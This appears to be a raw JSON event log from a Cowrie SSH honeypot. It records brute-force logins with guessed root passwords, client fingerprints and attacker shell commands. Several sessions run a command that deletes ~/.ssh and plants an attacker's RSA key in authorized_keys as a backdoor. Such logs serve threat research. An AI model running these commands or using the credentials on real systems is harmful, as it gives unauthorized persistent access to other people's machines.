{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:52:34.029365Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:52:34.212005Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:34.213025Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:52:34.242815Z","src_ip":"212.227.125.160","session":"04e74318d136"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:52:34.243884Z","src_ip":"212.227.125.160","session":"04e74318d136"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40791,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb31fe6c658c","protocol":"ssh","message":"New connection: 212.227.235.229:40791 (1.2.3.4:22) [session: eb31fe6c658c]","sensor":"my-vps","timestamp":"2025-08-31T06:52:34.542681Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"password1","message":"login attempt [user/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:52:37.164512Z","src_ip":"212.227.125.160","session":"04e74318d136"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:38.702628Z","src_ip":"212.227.125.160","session":"04e74318d136"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:52:41.151149Z","src_ip":"212.227.235.229","session":"eb31fe6c658c"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:41.152172Z","src_ip":"212.227.235.229","session":"eb31fe6c658c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42626,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc543c7ffba2","protocol":"ssh","message":"New connection: 212.227.235.229:42626 (1.2.3.4:22) [session: bc543c7ffba2]","sensor":"my-vps","timestamp":"2025-08-31T06:52:41.312796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:52:41.667550Z","src_ip":"212.227.235.229","session":"bc543c7ffba2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:52:41.831096Z","src_ip":"212.227.235.229","session":"bc543c7ffba2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37274,"dst_ip":"1.2.3.4","dst_port":22,"session":"8147634deb82","protocol":"ssh","message":"New connection: 212.227.235.229:37274 (1.2.3.4:22) [session: 8147634deb82]","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.255997Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37282,"dst_ip":"1.2.3.4","dst_port":22,"session":"98fc652a7a6a","protocol":"ssh","message":"New connection: 212.227.235.229:37282 (1.2.3.4:22) [session: 98fc652a7a6a]","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.257239Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37302,"dst_ip":"1.2.3.4","dst_port":22,"session":"178c111fa98c","protocol":"ssh","message":"New connection: 212.227.235.229:37302 (1.2.3.4:22) [session: 178c111fa98c]","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.258025Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37276,"dst_ip":"1.2.3.4","dst_port":22,"session":"aba98032cd05","protocol":"ssh","message":"New connection: 212.227.235.229:37276 (1.2.3.4:22) [session: aba98032cd05]","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.258795Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37232,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a741685b64c","protocol":"ssh","message":"New connection: 212.227.235.229:37232 (1.2.3.4:22) [session: 2a741685b64c]","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.259479Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37248,"dst_ip":"1.2.3.4","dst_port":22,"session":"50d943852867","protocol":"ssh","message":"New connection: 212.227.235.229:37248 (1.2.3.4:22) [session: 50d943852867]","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.260176Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37258,"dst_ip":"1.2.3.4","dst_port":22,"session":"89333713a5d3","protocol":"ssh","message":"New connection: 212.227.235.229:37258 (1.2.3.4:22) [session: 89333713a5d3]","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.260849Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37298,"dst_ip":"1.2.3.4","dst_port":22,"session":"c270f03471bf","protocol":"ssh","message":"New connection: 212.227.235.229:37298 (1.2.3.4:22) [session: c270f03471bf]","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.261577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.287145Z","src_ip":"212.227.235.229","session":"89333713a5d3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.295218Z","src_ip":"212.227.235.229","session":"c270f03471bf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.297001Z","src_ip":"212.227.235.229","session":"2a741685b64c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.298569Z","src_ip":"212.227.235.229","session":"aba98032cd05"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:52:44.300093Z","src_ip":"212.227.235.229","session":"98fc652a7a6a"}
{"eventid":"cowrie.session.closed","duration":"24.8","message":"Connection lost after 24.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:49.177982Z","src_ip":"212.227.125.160","session":"cb04e289cef6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:52:53.391977Z","src_ip":"212.227.235.229","session":"bc543c7ffba2"}
{"eventid":"cowrie.session.closed","duration":"25.7","message":"Connection lost after 25.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:53.808320Z","src_ip":"212.227.235.229","session":"7c83232969ee"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:52:53.809838Z","src_ip":"212.227.235.229","session":"bc543c7ffba2"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:52:58.312355Z","src_ip":"212.227.235.229","session":"579e40322504"}
{"eventid":"cowrie.session.closed","duration":"77.0","message":"Connection lost after 77.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:07.602013Z","src_ip":"212.227.235.229","session":"579e40322504"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42738,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae0b9b244b35","protocol":"ssh","message":"New connection: 212.227.235.229:42738 (1.2.3.4:22) [session: ae0b9b244b35]","sensor":"my-vps","timestamp":"2025-08-31T06:53:11.374259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:53:12.285950Z","src_ip":"212.227.235.229","session":"ae0b9b244b35"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:53:12.286912Z","src_ip":"212.227.235.229","session":"ae0b9b244b35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33034,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1780e237812","protocol":"ssh","message":"New connection: 212.227.235.229:33034 (1.2.3.4:22) [session: e1780e237812]","sensor":"my-vps","timestamp":"2025-08-31T06:53:14.407855Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"admin123","message":"login attempt [user/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:53:17.866256Z","src_ip":"212.227.235.229","session":"ae0b9b244b35"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:53:19.424761Z","src_ip":"212.227.235.229","session":"e1780e237812"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:53:19.465400Z","src_ip":"212.227.235.229","session":"e1780e237812"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:19.650800Z","src_ip":"212.227.235.229","session":"ae0b9b244b35"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":44853,"dst_ip":"1.2.3.4","dst_port":23,"session":"b3f6b20834c3","protocol":"telnet","message":"New connection: 103.77.214.206:44853 (1.2.3.4:23) [session: b3f6b20834c3]","sensor":"my-vps","timestamp":"2025-08-31T06:53:22.322496Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50976,"dst_ip":"1.2.3.4","dst_port":23,"session":"7102eb7ddc9a","protocol":"telnet","message":"New connection: 212.227.125.160:50976 (1.2.3.4:23) [session: 7102eb7ddc9a]","sensor":"my-vps","timestamp":"2025-08-31T06:53:23.371108Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60662,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d9e8abe978a","protocol":"ssh","message":"New connection: 212.227.125.160:60662 (1.2.3.4:22) [session: 4d9e8abe978a]","sensor":"my-vps","timestamp":"2025-08-31T06:53:32.063489Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43352,"dst_ip":"1.2.3.4","dst_port":22,"session":"e23c4d90e602","protocol":"ssh","message":"New connection: 212.227.235.229:43352 (1.2.3.4:22) [session: e23c4d90e602]","sensor":"my-vps","timestamp":"2025-08-31T06:53:32.255519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:53:32.256448Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:53:32.520131Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:53:32.918588Z","src_ip":"212.227.125.160","session":"4d9e8abe978a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:53:32.919310Z","src_ip":"212.227.125.160","session":"4d9e8abe978a"}
{"eventid":"cowrie.login.success","username":"root","password":"Qaz123wsx","message":"login attempt [root/Qaz123wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:53:33.619478Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:34.165808Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:53:34.166526Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:53:34.167629Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:34.433743Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:35.019845Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:53:35.020587Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.login.failed","username":"user","password":"admin123","message":"login attempt [user/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:53:35.443498Z","src_ip":"212.227.125.160","session":"4d9e8abe978a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:53:35.807461Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
